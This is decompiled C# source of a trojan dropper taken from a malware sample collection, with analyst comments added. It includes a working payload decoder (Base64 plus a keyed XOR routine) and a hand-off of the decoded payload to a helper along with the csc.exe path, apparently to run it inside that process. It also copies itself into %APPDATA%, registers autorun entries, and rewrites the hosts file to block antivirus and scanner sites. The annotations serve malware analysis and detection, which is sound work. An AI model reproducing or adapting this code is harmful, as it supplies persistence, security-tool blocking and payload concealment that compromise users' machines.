// Decompiled with JetBrains decompiler
|
|
// Type: YhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQ.fIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDp
|
|
// Assembly: rCWkXKkHG, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 4D884AA0-6931-492A-BF88-91705CD23369
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.atdt-6d6f9fa7620cf0056d02556ff97c31ce6e6915683c9f12177fc6b506a2dc19c9.exe
|
|
|
|
using Microsoft.VisualBasic.CompilerServices;
|
|
using Microsoft.Win32;
|
|
using System;
|
|
using System.IO;
|
|
using System.Reflection;
|
|
using System.Resources;
|
|
using System.Runtime.InteropServices;
|
|
using System.Text;
|
|
|
|
namespace YhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQ
|
|
{
|
|
[StandardModule]
|
|
internal sealed class fIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDp
|
|
{
|
|
// Resource manager bound to the resource set "duggsaogahsoghasikgasg" embedded in the
// executing assembly itself, so the data read below ships inside the sample rather than
// being fetched at run time.
private static ResourceManager pPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQ = new ResourceManager("duggsaogahsoghasikgasg", Assembly.GetExecutingAssembly());
// Embedded resource "picturekashfklhaskgasg", read as a string. Main Base64-decodes this
// string and passes the bytes to xordecrypt, so despite the "picture" name it is handled as
// an encoded blob. This initializer runs after the one above (textual order) and depends on it.
private static string cDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwV = (string) fIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDp.pPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQ.GetObject("picturekashfklhaskgasg");
|
|
|
|
// P/Invoke declaration for kernel32!Sleep. No call to it appears in this class.
// NOTE(review): the parameter is declared as a 64-bit long, while the Win32 Sleep takes a
// 32-bit DWORD; this looks like a VB-style declaration carried through decompilation.
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern void Sleep(long dwMilliseconds);
|
|
|
|
// Entry point of the dropper. In order, the visible code:
//   1. decodes the embedded resource string into a byte array (Base64, then xordecrypt);
//   2. hands that byte array plus the path of the .NET 2.0 csc.exe to a helper defined in
//      another (obfuscated) type;
//   3. copies its own executable into %APPDATA% under two fixed names and registers each
//      copy through a second helper;
//   4. replaces the hosts file with entries for antivirus and multi-scanner sites.
// Every stage sits in a try/catch that discards the exception (ProjectData.SetProjectError /
// ClearProjectError is the compiled form of a VB.NET catch), so a failing stage is silent.
// Analyst-relevant artefacts on this page: %APPDATA%\KqJuyYy.exe, %APPDATA%\KEWTpM.exe,
// the strings "BZohRyCWyD" / "nYSZDQPfjm", the key "freetheweed", and the rewritten hosts file.
[STAThread]
public static void Main()
{
    // Empty try body: nothing executes here. Presumably junk padding or code the decompiler
    // could not recover; either way it has no effect.
    try
    {
    }
    catch (Exception ex)
    {
        ProjectData.SetProjectError(ex);
        ProjectData.ClearProjectError();
    }
    // Payload decode. The resource string is Base64-decoded here, and xordecrypt Base64-decodes
    // the result a second time before XOR-ing it with the key bytes of "freetheweed".
    // This statement is outside any try block, so a malformed resource would terminate Main.
    byte[] pByteArray = fIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDp.xordecrypt(Convert.FromBase64String(fIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDp.cDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwV), Encoding.Default.GetBytes("freetheweed"));
    // Second empty try body; no effect.
    try
    {
    }
    catch (Exception ex)
    {
        ProjectData.SetProjectError(ex);
        ProjectData.ClearProjectError();
    }
    try
    {
        // Passes the decoded bytes and a path to the .NET Framework 2.0 C# compiler to a helper
        // that is not part of this file. The path is built from the first character of
        // Environment.SystemDirectory (the drive letter) plus a hard-coded "\Windows\..." suffix.
        // NOTE(review): handing a decoded byte array together with the path of a legitimate
        // Microsoft binary is consistent with running the payload under that host process;
        // confirm against the helper's body. For detection, csc.exe started by a parent that
        // is not a build tool is the observable to look for.
        aQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLk.bmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLkkMUgJcIgxXxJDVFbLWcYjBPX(pByteArray, Conversions.ToString(Environment.SystemDirectory[0]) + ":\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\csc.exe");
    }
    catch (Exception ex)
    {
        ProjectData.SetProjectError(ex);
        ProjectData.ClearProjectError();
    }
    try
    {
        // Call into another obfuscated type; its body is not in this file, so its effect
        // cannot be stated from here.
        gZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLkkMUgJcIgxXxJDVFbLWcYjBPXYhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWa.rofl();
        // Self-copy #1: the running module is copied to %APPDATA%\KqJuyYy.exe.
        // File.Copy without the overwrite flag throws when the destination already exists, so
        // on a machine where the copy is already present this line throws and everything below
        // it in this try block (second copy, hosts rewrite) is skipped by the catch.
        File.Copy(Assembly.GetExecutingAssembly().GetModules()[0].FullyQualifiedName, Environment.GetEnvironmentVariable("Appdata") + "\\KqJuyYy.exe");
        // Registers the quoted path of that copy under the name "BZohRyCWyD" with the enum value
        // TheCurrentoftheUSER. NOTE(review): name, quoted command line and a per-user selector
        // look like an autorun (Run-key style) registration for the current user; the helper is
        // defined elsewhere, so verify there.
        NXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkq.KSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfj("BZohRyCWyD", "\"" + Environment.GetEnvironmentVariable("Appdata") + "\\KqJuyYy.exe\"", NXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkq.IAHSgioahsgiaoshgiposahg.TheCurrentoftheUSER);
        // Self-copy #2: same source module, destination %APPDATA%\KEWTpM.exe.
        File.Copy(Assembly.GetExecutingAssembly().GetModules()[0].FullyQualifiedName, Environment.GetEnvironmentVariable("Appdata") + "\\KEWTpM.exe");
        // Same helper, name "nYSZDQPfjm", selector TheLocalofMachine (presumably the
        // machine-wide counterpart of the registration above; verify against the helper).
        NXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkq.KSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfj("nYSZDQPfjm", "\"" + Environment.GetEnvironmentVariable("Appdata") + "\\KEWTpM.exe\"", NXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkq.IAHSgioahsgiaoshgiposahg.TheLocalofMachine);
        // Parameterless call into yet another obfuscated type; effect not visible from this file.
        HOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGt();
        // Hosts-file tampering. The directory comes from the Tcpip "DataBasePath" registry value
        // (normally the drivers\etc directory; "oops" is only the fallback when the value is
        // missing). new StreamWriter(path) creates or overwrites, so the existing hosts file is
        // replaced, not appended to. Writing there normally needs administrative rights; without
        // them the exception is swallowed by the catch below.
        object Instance = (object) new StreamWriter(Conversions.ToString(Registry.GetValue("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", "DataBasePath", (object) "oops")) + "\\hosts");
        // Each pair of late-bound calls below writes one hosts entry followed by a newline
        // (late binding is how the VB.NET original called Write on an Object-typed variable).
        // The entries point virustotal.com, virscan.org, virusscan.jotti.org, kaspersky.com and
        // bitdefender.com (with and without "www.") at 127.0.0.1, cutting the host off from
        // those scanners and vendors by name. The lines whose second column is an IP address
        // put an address where a hostname belongs; NOTE(review): hosts lookups map names, so
        // these entries most likely do not affect connections made directly to those addresses.
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
        {
            (object) "127.0.0.1 www.virustotal.com"
        }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
        {
            (object) Environment.NewLine
        }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
        {
            (object) "127.0.0.1 virustotal.com"
        }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
        {
            (object) Environment.NewLine
        }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
        {
            (object) "127.0.0.1 74.53.201.162"
        }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
        {
            (object) Environment.NewLine
        }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
        {
            (object) "127.0.0.1 www.virscan.org"
        }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
        {
            (object) Environment.NewLine
        }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
        {
            (object) "127.0.0.1 virscan.org"
        }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
        {
            (object) Environment.NewLine
        }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
        {
            (object) "127.0.0.1 61.180.255.138"
        }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
        {
            (object) Environment.NewLine
        }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
        {
            (object) "127.0.0.1 www.virusscan.jotti.org"
        }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
        {
            (object) Environment.NewLine
        }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
        {
            (object) "127.0.0.1 virusscan.jotti.org"
        }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
        {
            (object) Environment.NewLine
        }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
        {
            (object) "127.0.0.1 209.160.72.83"
        }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
        {
            (object) Environment.NewLine
        }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
        {
            (object) "127.0.0.1 www.kaspersky.com"
        }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
        {
            (object) Environment.NewLine
        }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
        {
            (object) "127.0.0.1 kaspersky.com"
        }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
        {
            (object) Environment.NewLine
        }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
        {
            (object) "127.0.0.1 38.117.98.208"
        }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
        {
            (object) Environment.NewLine
        }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
        {
            (object) "127.0.0.1 www.bitdefender.com"
        }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
        {
            (object) Environment.NewLine
        }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
        {
            (object) "127.0.0.1 bitdefender.com"
        }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
        {
            (object) Environment.NewLine
        }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
        {
            (object) "127.0.0.1 66.40.145.200"
        }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
        {
            (object) Environment.NewLine
        }, (string[]) null, (Type[]) null, (bool[]) null, true);
        // The writer is disposed only on the success path; if any Write above throws, control
        // jumps to the catch and Dispose is not called from this method.
        NewLateBinding.LateCall(Instance, (Type) null, "Dispose", new object[0], (string[]) null, (Type[]) null, (bool[]) null, true);
    }
    catch (Exception ex)
    {
        ProjectData.SetProjectError(ex);
        ProjectData.ClearProjectError();
    }
}
|
|
|
|
/// <summary>
/// Decodes the embedded payload blob. <paramref name="input"/> is read as text in the
/// system default encoding and Base64-decoded; the last byte of the result is a per-blob
/// offset and every preceding byte is XOR-ed with a key byte shifted left by 0-7 bits.
/// </summary>
/// <param name="input">Bytes of a Base64 string (the caller has already removed one Base64 layer).</param>
/// <param name="key">Key bytes, used cyclically; Main passes the bytes of "freetheweed".</param>
/// <returns>The decoded bytes, one shorter than the Base64-decoded blob.</returns>
private static byte[] xordecrypt(byte[] input, byte[] key)
{
    byte[] blob = Convert.FromBase64String(Encoding.Default.GetString(input));
    int bodyLength = checked(blob.Length - 2 + 1);
    // Allocate before reading the trailer so an empty blob fails on the allocation, as before.
    byte[] decoded = new byte[bodyLength];
    // Trailing byte: folded into the shift amount of every position.
    byte offset = blob[checked(blob.Length - 1)];
    for (int i = 0; i < bodyLength; i = checked(i + 1))
    {
        byte cipherByte = blob[i];
        byte keyByte = key[i % key.Length];
        int shift = checked(i + (int)offset + key.Length) & 7;
        // Only the low 8 bits of the shifted key byte take part in the XOR.
        byte mask = unchecked((byte)((uint)keyByte << shift));
        decoded[i] = checked((byte)(cipherByte ^ mask));
    }
    return decoded;
}
|
|
|
|
/// <summary>
/// Returns <paramref name="Value"/> with its UTF-16 code units in reverse order.
/// No caller appears in this class.
/// </summary>
/// <param name="Value">String to reverse; a null argument raises NullReferenceException.</param>
/// <returns>The reversed string; an empty input yields an empty string.</returns>
public static string ReverseString(string Value)
{
    char[] units = new char[Value.Length];
    for (int i = 0; i < units.Length; i++)
    {
        // Mirror position i onto the opposite end of the source string.
        units[i] = Value[Value.Length - 1 - i];
    }
    return new string(units);
}
|
|
}
|
|
}
|